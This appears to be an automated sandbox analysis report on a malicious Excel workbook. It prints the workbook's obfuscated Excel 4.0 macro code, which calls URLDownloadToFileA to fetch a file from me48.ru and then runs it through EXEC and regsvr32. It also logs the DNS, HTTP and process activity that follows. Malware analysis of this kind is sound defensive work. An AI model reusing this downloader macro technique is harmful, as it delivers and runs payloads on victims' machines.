                                                                                                                                                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 00 01 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 bf 00 00 00 02 00 00 00 e3 04 00 00
                                                                                                                                                      Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                      General
                                                                                                                                                      Stream Path:\x5SummaryInformation
                                                                                                                                                      File Type:data
                                                                                                                                                      Stream Size:4096
                                                                                                                                                      Entropy:0.254255489206
                                                                                                                                                      Base64 Encoded:False
                                                                                                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00
                                                                                                                                                      Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 326259
                                                                                                                                                      General
                                                                                                                                                      Stream Path:Workbook
                                                                                                                                                      File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                      Stream Size:326259
                                                                                                                                                      Entropy:7.65610249915
                                                                                                                                                      Base64 Encoded:True
                                                                                                                                                      Data ASCII:. . . . . . . . f 2 . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . l . . 9 P . 8 . . . . . . . X . @ . . . . . .
                                                                                                                                                      Data Raw:09 08 10 00 00 06 05 00 66 32 cd 07 c9 80 01 00 06 06 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                                                                                                                      Macro 4.0 Code

                                                                                                                                                      CALL("Ke"&????2!HN342&"32", "Cr"&????2!HP370&"yA", "JCJ", ????2!HE340&????2!HE355, 0)
                                                                                                                                                      
                                                                                                                                                      CALL("U"&????2!HP360, "U"&????4!E65, "IICCII", 0, ????2!EE100, ????2!HE340&????2!HE355&????2!HE369, 0, 0)
                                                                                                                                                      
                                                                                                                                                      =RUN(R59),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=RUN(????4!D50),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=CALL(""Ke""&????2!HN342&""32"",""Cr""&????2!HP370&""yA"",""JCJ"",????2!HE340&????2!HE355,0)",,,,,,,,,,,,,,,,,=RUN(????5!A50),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
                                                                                                                                                      "=CALL(""Ke""&????2!HN342&""32"",""Cr""&????2!HP370&""yA"",""JCJ"",????2!HE340,0)",,,,=RUN(????1!M66),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=CONCATENATE(E67,E68,E69,E70,E71,E72,E73,E74,E75,E76,E77,E78,E79,E80,E81,E82,E83)",,,,"=CHAR(SUM(F66,G66,H66))",25,35,25,"=CHAR(SUM(F67,G67,H67))",20,42,20,"=CHAR(SUM(F68,G68,H68))",25,26,25,=CHAR(F69-G69-H69),100,22,10,=CHAR(F70-G70-H70),200,50,39,=CHAR(F71-G71-H71),500,300,81,=CHAR(F72+G72-H72),120,130,140,=CHAR(F73+G73-H73),200,300,392,=CHAR(F74+G74-H74),400,500,789,=CHAR(F75-G75+H75),500,430,27,=CHAR(F76-G76+H76),310,270,60,=CHAR(F77-G77+H77),200,160,44,"=CHAR(SUM(F78,G78,H78))",56,37,18,"=CHAR(SUM(F79,G79,H79))",27,18,25,"=CHAR(SUM(F80,G80,H80))",44,58,3,=CHAR(F81-G81-H81),384,115,161,=CHAR(F82-G82-H82),762,504,157,=CHAR(F83-G83-H83),501,328,108
                                                                                                                                                      "=CALL(""U""&????2!HP360,""U""&????4!E65,""IICCII"",0,????2!EE100,????2!HE340&????2!HE355&????2!HE369,0,0)"=EXEC(????3!W36&????2!HE340&????2!HE355&????2!HE369)=HALT()

                                                                                                                                                      Network Behavior

                                                                                                                                                      Network Port Distribution

                                                                                                                                                      TCP Packets

                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                      Nov 29, 2020 05:55:31.076948881 CET4972580192.168.2.3188.225.24.87
                                                                                                                                                      Nov 29, 2020 05:55:31.138463974 CET8049725188.225.24.87192.168.2.3
                                                                                                                                                      Nov 29, 2020 05:55:31.138636112 CET4972580192.168.2.3188.225.24.87
                                                                                                                                                      Nov 29, 2020 05:55:31.139062881 CET4972580192.168.2.3188.225.24.87
                                                                                                                                                      Nov 29, 2020 05:55:31.200372934 CET8049725188.225.24.87192.168.2.3
                                                                                                                                                      Nov 29, 2020 05:55:32.227155924 CET8049725188.225.24.87192.168.2.3
                                                                                                                                                      Nov 29, 2020 05:55:32.227271080 CET4972580192.168.2.3188.225.24.87
                                                                                                                                                      Nov 29, 2020 05:55:37.232266903 CET8049725188.225.24.87192.168.2.3
                                                                                                                                                      Nov 29, 2020 05:55:37.232578993 CET4972580192.168.2.3188.225.24.87
                                                                                                                                                      Nov 29, 2020 05:57:16.843187094 CET4972580192.168.2.3188.225.24.87
                                                                                                                                                      Nov 29, 2020 05:57:17.154232979 CET4972580192.168.2.3188.225.24.87
                                                                                                                                                      Nov 29, 2020 05:57:17.763737917 CET4972580192.168.2.3188.225.24.87
                                                                                                                                                      Nov 29, 2020 05:57:18.967041016 CET4972580192.168.2.3188.225.24.87
                                                                                                                                                      Nov 29, 2020 05:57:21.374032021 CET4972580192.168.2.3188.225.24.87
                                                                                                                                                      Nov 29, 2020 05:57:26.186332941 CET4972580192.168.2.3188.225.24.87
                                                                                                                                                      Nov 29, 2020 05:57:35.797156096 CET4972580192.168.2.3188.225.24.87

                                                                                                                                                      UDP Packets

                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                      Nov 29, 2020 05:55:14.662311077 CET6349253192.168.2.38.8.8.8
                                                                                                                                                      Nov 29, 2020 05:55:14.700413942 CET53634928.8.8.8192.168.2.3
                                                                                                                                                      Nov 29, 2020 05:55:15.357100010 CET6083153192.168.2.38.8.8.8
                                                                                                                                                      Nov 29, 2020 05:55:15.392714977 CET53608318.8.8.8192.168.2.3
                                                                                                                                                      Nov 29, 2020 05:55:16.473083019 CET6010053192.168.2.38.8.8.8
                                                                                                                                                      Nov 29, 2020 05:55:16.500411034 CET53601008.8.8.8192.168.2.3
                                                                                                                                                      Nov 29, 2020 05:55:17.517493963 CET5319553192.168.2.38.8.8.8
                                                                                                                                                      Nov 29, 2020 05:55:17.544625998 CET53531958.8.8.8192.168.2.3
                                                                                                                                                      Nov 29, 2020 05:55:18.491626978 CET5014153192.168.2.38.8.8.8
                                                                                                                                                      Nov 29, 2020 05:55:18.527076960 CET53501418.8.8.8192.168.2.3
                                                                                                                                                      Nov 29, 2020 05:55:19.984466076 CET5302353192.168.2.38.8.8.8
                                                                                                                                                      Nov 29, 2020 05:55:20.011678934 CET53530238.8.8.8192.168.2.3
                                                                                                                                                      Nov 29, 2020 05:55:24.311774969 CET4956353192.168.2.38.8.8.8
                                                                                                                                                      Nov 29, 2020 05:55:24.338999987 CET53495638.8.8.8192.168.2.3
                                                                                                                                                      Nov 29, 2020 05:55:25.878359079 CET5135253192.168.2.38.8.8.8
                                                                                                                                                      Nov 29, 2020 05:55:25.914064884 CET53513528.8.8.8192.168.2.3
                                                                                                                                                      Nov 29, 2020 05:55:26.868820906 CET5934953192.168.2.38.8.8.8
                                                                                                                                                      Nov 29, 2020 05:55:26.904412031 CET53593498.8.8.8192.168.2.3
                                                                                                                                                      Nov 29, 2020 05:55:27.087584972 CET5708453192.168.2.38.8.8.8
                                                                                                                                                      Nov 29, 2020 05:55:27.123055935 CET53570848.8.8.8192.168.2.3
                                                                                                                                                      Nov 29, 2020 05:55:27.233953953 CET5882353192.168.2.38.8.8.8
                                                                                                                                                      Nov 29, 2020 05:55:27.271859884 CET53588238.8.8.8192.168.2.3
                                                                                                                                                      Nov 29, 2020 05:55:28.345890999 CET5882353192.168.2.38.8.8.8
                                                                                                                                                      Nov 29, 2020 05:55:28.383758068 CET53588238.8.8.8192.168.2.3
                                                                                                                                                      Nov 29, 2020 05:55:29.333081007 CET5882353192.168.2.38.8.8.8
                                                                                                                                                      Nov 29, 2020 05:55:29.370759010 CET53588238.8.8.8192.168.2.3
                                                                                                                                                      Nov 29, 2020 05:55:30.371635914 CET5756853192.168.2.38.8.8.8
                                                                                                                                                      Nov 29, 2020 05:55:30.398916006 CET53575688.8.8.8192.168.2.3
                                                                                                                                                      Nov 29, 2020 05:55:31.005606890 CET5054053192.168.2.38.8.8.8
                                                                                                                                                      Nov 29, 2020 05:55:31.075176954 CET53505408.8.8.8192.168.2.3
                                                                                                                                                      Nov 29, 2020 05:55:31.348639011 CET5882353192.168.2.38.8.8.8
                                                                                                                                                      Nov 29, 2020 05:55:31.384119987 CET53588238.8.8.8192.168.2.3
                                                                                                                                                      Nov 29, 2020 05:55:31.939313889 CET5436653192.168.2.38.8.8.8
                                                                                                                                                      Nov 29, 2020 05:55:31.966629982 CET53543668.8.8.8192.168.2.3
                                                                                                                                                      Nov 29, 2020 05:55:35.441679955 CET5882353192.168.2.38.8.8.8
                                                                                                                                                      Nov 29, 2020 05:55:35.477302074 CET53588238.8.8.8192.168.2.3
                                                                                                                                                      Nov 29, 2020 05:55:40.188608885 CET5303453192.168.2.38.8.8.8
                                                                                                                                                      Nov 29, 2020 05:55:40.215712070 CET53530348.8.8.8192.168.2.3
                                                                                                                                                      Nov 29, 2020 05:55:48.850267887 CET5776253192.168.2.38.8.8.8
                                                                                                                                                      Nov 29, 2020 05:55:48.887435913 CET53577628.8.8.8192.168.2.3
                                                                                                                                                      Nov 29, 2020 05:55:54.445745945 CET5543553192.168.2.38.8.8.8
                                                                                                                                                      Nov 29, 2020 05:55:54.495841980 CET53554358.8.8.8192.168.2.3
                                                                                                                                                      Nov 29, 2020 05:56:04.432990074 CET5071353192.168.2.38.8.8.8
                                                                                                                                                      Nov 29, 2020 05:56:04.469691992 CET53507138.8.8.8192.168.2.3
                                                                                                                                                      Nov 29, 2020 05:56:14.496129990 CET5613253192.168.2.38.8.8.8
                                                                                                                                                      Nov 29, 2020 05:56:14.523108006 CET53561328.8.8.8192.168.2.3
                                                                                                                                                      Nov 29, 2020 05:56:17.995176077 CET5898753192.168.2.38.8.8.8
                                                                                                                                                      Nov 29, 2020 05:56:18.032025099 CET53589878.8.8.8192.168.2.3
                                                                                                                                                      Nov 29, 2020 05:56:48.914025068 CET5657953192.168.2.38.8.8.8
                                                                                                                                                      Nov 29, 2020 05:56:48.941294909 CET53565798.8.8.8192.168.2.3
                                                                                                                                                      Nov 29, 2020 05:56:50.780658960 CET6063353192.168.2.38.8.8.8
                                                                                                                                                      Nov 29, 2020 05:56:50.831813097 CET53606338.8.8.8192.168.2.3

                                                                                                                                                      DNS Queries

                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                      Nov 29, 2020 05:55:31.005606890 CET192.168.2.38.8.8.80xe1c9Standard query (0)me48.ruA (IP address)IN (0x0001)

                                                                                                                                                      DNS Answers

                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                      Nov 29, 2020 05:55:31.075176954 CET8.8.8.8192.168.2.30xe1c9No error (0)me48.ru188.225.24.87A (IP address)IN (0x0001)

                                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                                      • me48.ru

                                                                                                                                                      HTTP Packets

                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                      0192.168.2.349725188.225.24.8780C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                      Nov 29, 2020 05:55:31.139062881 CET160OUTGET /ds/231120.gif HTTP/1.1
                                                                                                                                                      Accept: */*
                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                      Host: me48.ru
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Nov 29, 2020 05:55:32.227155924 CET173INHTTP/1.1 200 OK
                                                                                                                                                      Date: Sun, 29 Nov 2020 04:55:31 GMT
                                                                                                                                                      Server: Apache/2.4.18 (Ubuntu)
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Content-Type: image/gif


                                                                                                                                                      Code Manipulations

                                                                                                                                                      Statistics

                                                                                                                                                      CPU Usage

                                                                                                                                                      Click to jump to process

                                                                                                                                                      Memory Usage

                                                                                                                                                      Click to jump to process

                                                                                                                                                      High Level Behavior Distribution

                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                      Behavior

                                                                                                                                                      Click to jump to process

                                                                                                                                                      System Behavior

                                                                                                                                                      General

                                                                                                                                                      Start time:05:55:24
                                                                                                                                                      Start date:29/11/2020
                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                      Imagebase:0x40000
                                                                                                                                                      File size:27110184 bytes
                                                                                                                                                      MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      General

                                                                                                                                                      Start time:05:55:31
                                                                                                                                                      Start date:29/11/2020
                                                                                                                                                      Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll
                                                                                                                                                      Imagebase:0x1250000
                                                                                                                                                      File size:20992 bytes
                                                                                                                                                      MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      Disassembly

                                                                                                                                                      Code Analysis

                                                                                                                                                      Reset < >